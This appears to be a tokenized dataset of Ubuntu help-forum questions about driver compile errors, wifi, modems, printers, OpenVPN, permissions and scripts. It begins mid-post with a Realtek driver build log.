proc_set_read_reg ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:396:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` fwstate '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:404:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` sec_info '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:412:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mlmext_state '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:420:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` qos_option '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:427:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ht_option '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:434:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_info '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:441:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ap_info '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:448:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` adapter_state '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:455:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` trx_info '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:462:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:469:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:476:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` mac_reg_dump3 '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:483:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:490:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:497:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` bb_reg_dump3 '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:504:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump1 '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:511:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump2 '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:520:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump3 '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:527:9 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rf_reg_dump4 '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:537:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` all_sta_info '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:555:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` best_channel '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:561:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_best_channel ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:564:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rx_signal '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:570:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rx_signal ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:572:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ht_enable '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:578:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_ht_enable ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:580:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` cbw40_enable '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:586:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_cbw40_enable ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:588:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` ampdu_enable '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:594:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_ampdu_enable ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:596:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rx_stbc '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:602:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rx_stbc ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:605:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` path_rssi '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:608:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` vid '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:615:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` pid '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:622:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` rssi_disp '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:628:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_rssi_disp ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:631:8 : warning : assignment makes pointer from integer without a cast [ enabled by default ] entry = create_proc_read_entry ( `` sreset '' , s_ifreg | s_irugo , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:637:7 : error : dereferencing pointer to incomplete type entry- > write_proc = proc_set_sreset ; ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c : at top level : /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:999:2 : warning : initialization from incompatible pointer type [ enabled by default ] .ndo_select_queue = rtw_select_queue , ^ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.c:999:2 : warning : ( near initialization for ‘rtw_netdev_ops.ndo_select_queue’ ) [ enabled by default ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/os_dep/linux/os_intfs.o ] error 1 make [ 1 ] : *** [ _module_/home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911/driver/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-24-generic' make : *** [ modules ] error 2 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # compile make driver error : 2 please check error mesg # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # root @ quartize-pc : /home/quartize/desktop/rtl8188c_8192c_usb_linux_v4.0.2_9000.20130911 # i have deleted uppper part of these compilation message because of limited posting space
470078	any way to track an application	i have a software which when i go its directory path in terminal i run ./myprogram and my application start so i want to know how to understand which files are reading by my program which is not related to my program ? for example suppose my program read files from system how to know which are this files ?
470079	usb modem not working after upgrading to 14.04	i have compaq presario cq40 . my usb modem micromax mmx352g was working quite well in previous version ubuntu 12.04 . i have upgraded to 14.04 just now . after upgrading , option of mobile broadband is not seen in the dropout menu . although it is working with another phone connected with bluetooth . how i can bring the mobile broadband option in the dropout menu of network connections ?
470082	wifi connection not working for ubuntu 12.04 ?	i have replaced my windows installation with ubuntu 12.04 on my hp notebook but now the wireless doesnt work . i can connect to the internet using an ethernet cable but thats it . the wireless button is also displaying amber but wont change to blue when pressed . can anyone help me with this ? outputs : sudo lshw -c network *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 07 serial : a0:48:1c:20:6b : b7 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.1.5 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:78 ioport:3000 ( size=256 ) memory : f0104000-f0104fff memory : f0100000-f0103fff memory : f0110000-f011ffff *-network unclaimed description : network controller product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:06:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : ioport:2000 ( size=256 ) memory : f0200000-f0203fff iwconfig lo no wireless extensions . eth0 no wireless extensions .
470085	fails to print brother hl2250dn & lexmark 534dn using ubuntu 14.04	before the upgrade to 14.04 , i could print using networked brother hl 2250dn and lexmark c534dn . now i can only print to lexmark but only through pdf . it does not work on libreoffice . for brother hl2250dn , it will prompt printer not connected . it is of course connected . the driver was also upgraded by using the program offered by brother europe . this is very frustrating .
470086	ubuntu and hp scanning	help ! just installed ubuntu to replace xp . excellent so far , except ubuntu will not accept the install disc for my hp deskjet f4580 . it has recognised the item and allowed me to print even before i tried the disc . now i wish to scan documents and i ca n't do this without the hp software installed . it keeps telling me the archive manager has an error when i try to get it to read the hp disc.it has the hp menu but not start the set up process . is there a remedy please . i really use my scanner a lot and am now lost . any useful comments please . stuart
470088	gtk warning regarding	while downloading ns2.35 in ubuntu 14.04 i have tried to execute this command sudo gedit linkstate/ls.h im getting this error ( gedit:30857 ) : gtk-warning ** : calling inhibit failed : gdbus.error : org.freedesktop.dbus.error.serviceunknown : the name org.gnome.sessionmanager was not provided by any .service files sir just want to know what could be the error how it will be rectified in installing ns2
470090	how do i find the recently used files through terminal ?	i want to see the recently used ( accessed ) files along with their path through terminal . how could i get that files list ? note : this question is not a duplicate of show recent modified/created files using terminal
470092	change folder permissions and all sub-folders	i 'm working on a php website at the moment and i 'm doing a lot of writing to files and directories . whenever these files are made , they 're automatically owned by daemon and i have to go into terminal and execute sudo chown varosion /opt/lampp/htdocs/apps/ < folder > in order to edit or delete these files . is there anyway to take full ownership of the entire lampp folder and all future changes made to it ? if that 's not possible , is there anyway to change phps default ownership ? edit : i just found the option `` change permissions for enclosed files '' , i 'm not sure if this has solved my problem but it sounds like it .
470094	hourly crashes 14.04	what can i do ? it crashes all time . here is all i can find from the logs : may 21 20:09:24 acj888-desktop kernel : [ 43.487873 ] valid ecryptfs headers not found in file header region or xattr region , inode 32376924 may 21 20:09:24 acj888-desktop kernel : [ 43.487898 ] valid ecryptfs headers not found in file header region or xattr region , inode 32376924
470096	remove single package and not dependent packages	i have to remove libgail18 as suggested on this site https : //bugs.eclipse.org/bugs/show_bug.cgi ? id=384315 ( pls search libgail18 on this to get the exact information ) to make swt virtual table work . i used sudo apt-get remove libgail18 to remove , but this command removed many more along with some of the eclipse packages . this way my software too is not working now . please help me to remove the libgail18 package only ...
470097	error installing nvidia driver manually .	i installed driver nvidia manually . i added : blacklist vga16fb blacklist nouveau blacklist rivafb blacklist nvidiafb blacklist rivatv in file blacklist.conf but when i install , i receive message : error : unable to load the kernel module ânvidia.koâ . this happens most frequently when this kernel module was built against the wrong or improperly configured kernel sources , with a version of gcc that differs from the one used to build the target kernel , or if a driver such as rivafb/nvidiafb is present and prevents the nvidia kernel module from obtaining ownership of the nvidia graphics device ( s ) , or nvidia gpu installed in this system is not supported by this nvidia linux graphics driver release . how i can fix it ?
470098	error while disabling adminstrator password expiry	i want to disable administrator password expiry but while giving following command ( /usr/local/samba/bin/samba-tool user setexpiry administrator -- noexpiry ) but i recive below error : unknown enumerated value 'active directory domain controller'for 'server role' error ( runtime ) : uncaught exception - unable to load default file file '' usr/local/samba/lib/python2.7/site-packages/samba/netcmd/init.py '' , line 175 , in _run return self.run ( *args , **kwargs ) file '' usr/local/samba/lib/python2.7/site-packages/samba/netcmd/user.py '' , line 441 , in _run ip= sambaopts.get_loadparm ( ) file '' usr/local/samba/lib/python2.7/site-packagew/samba/netcmd/getoptpy '' , line 92 , in get_loadparm self._lp.load_default ( )
470099	running a shell script automatically	could any one please suggest me on which boot level or /etc/rc.x folder should i include my shell script so that it runs automatically immediately after login or just before the system prompts for login in lts 12.04 thanks
470100	are some hard-drives incompatible with linux ?	now i 've actually been here with a similar question before - but was largely inspecific because i did n't know what i was really looking for . however , onto the question . i have a laptop that i 've had for a number of years , and every time without fail that i 've attempted to install a linux distribution onto it , it 's spat it right back at my face - instead opting to show a flashing underscore where grub should live . a number of suggestions to try a bunch of different distros from crunchbang to elementary to debian to fedora popped up , but unfortunately none of them would boot . now - it 's an older laptop ( 3-4 years ) by uk company novatech . the motherboard is developed by clevo co. , and it has an intel core 2 duo t6600 ( 2.2ghz ) with 4gb of ram and an nvidia g105m ( which i initially thought was the issue ) . when you run the liveusb/cd of the operating system , it works fine - no issues whatsoever . in fact , it 's arguably more compatible out of the box than windows is ( some hardware functions that need drivers on windows do n't on ubuntu ) . so i took it down to the differing factors - and a big one was that the usb stick i 'm reading off of is set to fat file system , instead of ext4 ( which i thought maybe could be an issue if the developers of the laptop did n't really take much care to support linux operating systems ) , and also its a usb stick . it 's not the hard drive . i guess that 's a pretty big difference in itself . also , on older versions of ubuntu , it would briefly after bios screen display a piece of text : `` grub loading ... '' , and it 's remain there instead of just the flashing underscore . i guess my overall question is - can certain hard-drives not 'have ' ext4 partitions ? or can some hard drives be incompatible with linux/grub ? or is it my hardware , and if so - why does it run fine off the memory stick ? would this be solved if i somehow installed linux onto an ntfs or fat partition ( if that 's possible , i imagine it is , with linux being linux ) . anyway , hopefully i did n't kill too many of your sanities with the wall of text . thanks in advance : )
470101	openvpn is not connecting over udp	openvpn works fine over tcp port 443 but fails to connect over udp port 53 . i 've checked firewalls . initial handshake works fine but then client hangs in wait state . vpn server is ubuntu and client is windows . update : just tried to connect from different network and everything worked fine . what may be broken in my network ? here are the configs : mode server tls-server server 172.16.130.0 255.255.255.0 port 53 proto udp dev tun0 comp-lzo persist-key persist-tun user nobody group nogroup duplicate-cn keepalive 10 120 ifconfig-pool-persist ipp.txt status openvpn-status.log log-append /var/log/openvpn.log verb 5 # certificates and encryption ca easy-rsa/keys/ca.crt cert easy-rsa/keys/home.crt key easy-rsa/keys/home.key dh easy-rsa/keys/dh2048.pem tls-auth easy-rsa/keys/ta.key 0 # routes push `` route 172.16.128.0 255.255.252.0 '' . client dev tun dev-node vpn-home proto udp remote 89.188.126.148 53 resolv-retry infinite nobind persist-key persist-tun ca home_ca.crt cert home-client.crt key home-client.key tls-auth home_ta.key 1 comp-lzo verb 5 and logs . server : wed may 21 16:40:43 2014 us=592168 initialization sequence completed wed may 21 16:41:02 2014 us=502237 multi : multi_create_instance called wed may 21 16:41:02 2014 us=502452 85.142.26.224:20351 re-using ssl/tls context wed may 21 16:41:02 2014 us=502597 85.142.26.224:20351 lzo compression initialized wed may 21 16:41:02 2014 us=503143 85.142.26.224:20351 control channel mtu parms [ l:1542 d:166 ef:66 eb:0 et:0 el:0 ] wed may 21 16:41:02 2014 us=503208 85.142.26.224:20351 data channel mtu parms [ l:1542 d:1450 ef:42 eb:135 et:0 el:0 af:3/1 ] wed may 21 16:41:02 2014 us=503359 85.142.26.224:20351 local options string : 'v4 , dev-type tun , link-mtu 1542 , tun-mtu 1500 , proto udpv4 , comp-lzo , keydir 0 , cipher bf-cbc , auth sha1 , keysize 128 , tls-auth , key-method 2 , tls-server' wed may 21 16:41:02 2014 us=503409 85.142.26.224:20351 expected remote options string : 'v4 , dev-type tun , link-mtu 1542 , tun-mtu 1500 , proto udpv4 , comp-lzo , keydir 1 , cipher bf-cbc , auth sha1 , keysize 128 , tls-auth , key-method 2 , tls-client' wed may 21 16:41:02 2014 us=503493 85.142.26.224:20351 local options hash ( ver=v4 ) : '14168603' wed may 21 16:41:02 2014 us=503557 85.142.26.224:20351 expected remote options hash ( ver=v4 ) : '504e774e' rwed may 21 16:41:02 2014 us=503691 85.142.26.224:20351 tls : initial packet from [ af_inet ] 85.142.26.224:20351 , sid=ac1bebfb 9e347a98 wwrwwrwrwrw^c client : wed may 21 16:40:45 2014 openvpn 2.3.2 x86_64-w64-mingw32 [ ssl ( openssl ) ] [ lzo ] [ pkcs11 ] [ eurephia ] [ ipv6 ] built on aug 8 2013 wed may 21 16:40:45 2014 management : tcp socket listening on [ af_inet ] 127.0.0.1:25340 wed may 21 16:40:45 2014 need hold release from management interface , waiting ... wed may 21 16:40:45 2014 management : client connected from [ af_inet ] 127.0.0.1:25340 wed may 21 16:40:45 2014 management : cmd 'state on' wed may 21 16:40:45 2014 management : cmd 'log all on' wed may 21 16:40:46 2014 management : cmd 'hold off' wed may 21 16:40:46 2014 management : cmd 'hold release' wed may 21 16:40:46 2014 warning : no server certificate verification method has been enabled . see http : //openvpn.net/howto.html # mitm for more info . wed may 21 16:40:46 2014 control channel authentication : using 'home_ta.key ' as a openvpn static key file wed may 21 16:40:46 2014 outgoing control channel authentication : using 160 bit message hash 'sha1 ' for hmac authentication wed may 21 16:40:46 2014 incoming control channel authentication : using 160 bit message hash 'sha1 ' for hmac authentication wed may 21 16:40:46 2014 lzo compression initialized wed may 21 16:40:46 2014 control channel mtu parms [ l:1542 d:166 ef:66 eb:0 et:0 el:0 ] wed may 21 16:40:46 2014 socket buffers : r= [ 8192- > 8192 ] s= [ 8192- > 8192 ] wed may 21 16:40:46 2014 management : > state:1400676046 , resolve , , , wed may 21 16:40:46 2014 data channel mtu parms [ l:1542 d:1450 ef:42 eb:135 et:0 el:0 af:3/1 ] wed may 21 16:40:46 2014 local options string : 'v4 , dev-type tun , link-mtu 1542 , tun-mtu 1500 , proto udpv4 , comp-lzo , keydir 1 , cipher bf-cbc , auth sha1 , keysize 128 , tls-auth , key-method 2 , tls-client' wed may 21 16:40:46 2014 expected remote options string : 'v4 , dev-type tun , link-mtu 1542 , tun-mtu 1500 , proto udpv4 , comp-lzo , keydir 0 , cipher bf-cbc , auth sha1 , keysize 128 , tls-auth , key-method 2 , tls-server' wed may 21 16:40:46 2014 local options hash ( ver=v4 ) : '504e774e' wed may 21 16:40:46 2014 expected remote options hash ( ver=v4 ) : '14168603' wed may 21 16:40:46 2014 udpv4 link local : [ undef ] wed may 21 16:40:46 2014 udpv4 link remote : [ af_inet ] 89.188.126.148:53 wed may 21 16:40:46 2014 management : > state:1400676046 , wait , , ,
470102	processors being thrashed on startup	i am running 14.04 64 bit on a thinkpad t61 2 gb ram 60 gb ssd and on startup both of the processors is showing in the 70 to 80 percent range and it is overheating ( over 76 c ) and when i look at the system monitor nothing shows up using allot , usually the monitor itself shows using the most . it calms down after i put it to sleep and wake it back up if i was running windows i would swear i had a virus what could be causing it and is there a app that will show what processes is running ?
470105	swt virtual table not working on customised ubuntu	when i run a software developed using eclipse indigo on ubuntu 12.04 lts , the virtual table works smoothly . but the same software , when executed on a customized version of ubuntu 12.04 lts , virtual table does n't display data . so in the customized version , certain packages might have been deleted which are required for proper working of swt virtual tableviewer . can anybody help me on this ?
470108	how to reset dell 15r-5521 pre-installed ubuntu	i am new to the forum and ubuntu . i have purchase 7 months back dell 5521 which came with ubuntu pre-installed . as i was not good in ubuntu , i installed windows 7 . here comes the problem , now i have many different problems ; system is slow , drivers for windows are not updating and many more , usb , virus , trojan ) , amd graphics driver is not installed and ca n't use additional partition . i need to reset my laptop to default setting which should be ubuntu although still there is os partition of 3gb available which has files for ubuntu . i do n't need any data from my system .
470109	how to create filesystem with nfs for user mode linux	i trying to debug user mode linux and have referred this wiki for it . how to build and configure kernel and file system for uml in ubuntu 11.10 ? but how do i add support for nfs into the created filesystem ?
470114	micromax mmx352g not working in ubuntu 14.04	my micromax usb modem mmx352g was working well in ubuntu 12.04 . after upgrading to ubuntu 14.04 , no option for mobile broadband is found in the dropout menu .
470118	after installing bumblebee and rebooting screen stuck at 640x400 resolution	just as the title says after installing bumblebee on ubuntu 14.04 and rebooting my screen is now stuck at a 640x400 resolution . i tried uninstalling bumblebee but that didnt fix the problem at all . now im stuck with a low res screen and have absolutely no idea what to do about it . i saw the same problem here : `` screen resolution stuck at 640x480 after installing bumblebee '' but i do not have the file they are talking about and so can not fix it in that way . honestly i dont know if i can fix this and am considering just a fresh install of ubuntu . so my question is , is there any way i can fix this and if not , how would i go about a fresh install of ubuntu on a dual booting machine ? thanks
470119	python command in bash does not find -c flag	i have two python lines in my bash script , both should run with -c flag , but once i run the bash script it tells me that it could not find -c flag that is needed for python to run the command in bash . it does work from command like if i copy the python command to command line it runs the command , but not from inside the script . error output : mount.sh : 40 : mount.sh : -c : not found my script : # # define a function that launched the zenity username dialog get_username ( ) { zenity -- entry -- width=300 -- title= '' mount $ mountdir '' -- text= '' username : '' } # define a function that launched the zenity password dialog get_password ( ) { zenity -- entry -- width=300 -- title= '' mount $ mountdir '' -- text= '' password : '' -- hide-text } # attempt to get the username and exit if cancel was pressed . wusername= $ ( get_username ) || exit # if the username is empty or matches only whitespace . while [ `` $ ( expr match `` $ wusername '' ' . ' ) '' -lt `` 1 '' ] ; do zenity -- error -- title= '' error in username ! '' -- text= '' please check your username ! username field can not be empty ! '' || exit wusername= $ ( get_username ) || exit done wpassword= $ ( get_password ) || exit while [ `` $ ( expr match `` $ wpassword '' ' . ' ) '' -lt `` 1 '' ] ; do zenity -- error -- title= '' error in password ! '' -- text= '' please check your password ! password field can not be empty ! '' || exit wpassword= $ ( get_password ) || exit done python -c 'import keyring ; keyring.set_password ( `` winmount '' , wusername , wpassword ) ' get_wpassword=python -c 'import keyring ; keyring.get_password ( `` winmount '' , wusername ) ' # mount windows share to mountpoint sudo mount -t cifs // $ server/ $ share $ { home } / $ { dirname } -o username= $ { wusername } , password= $ get_wpassword , domain= $ { domain }
470121	postfix and ownclound mysql authentication	i 'm using ubuntu 12.04 with roundcube/postfix and owncloud installed , and using mysql as login authentication . i would like to know if it 's possible to make single login for these apps ( without ldap ) ? so the users do n't have to login for every apps on the server postfix and owncloud is using different format/encryption for password stored in mysql so even they are on the same database.. i still ca n't figure out , how to make them using single table for username and password
470122	launcher is auto hides but not comig back	i 'm using ubuntu 14.04 . when i turn on the auto hide launcher on the launcher hides but does not reveal back though increased the intensity of coming it back at the highest level so please help to sort out this problem any code should i have t write in terminal ? ? ?
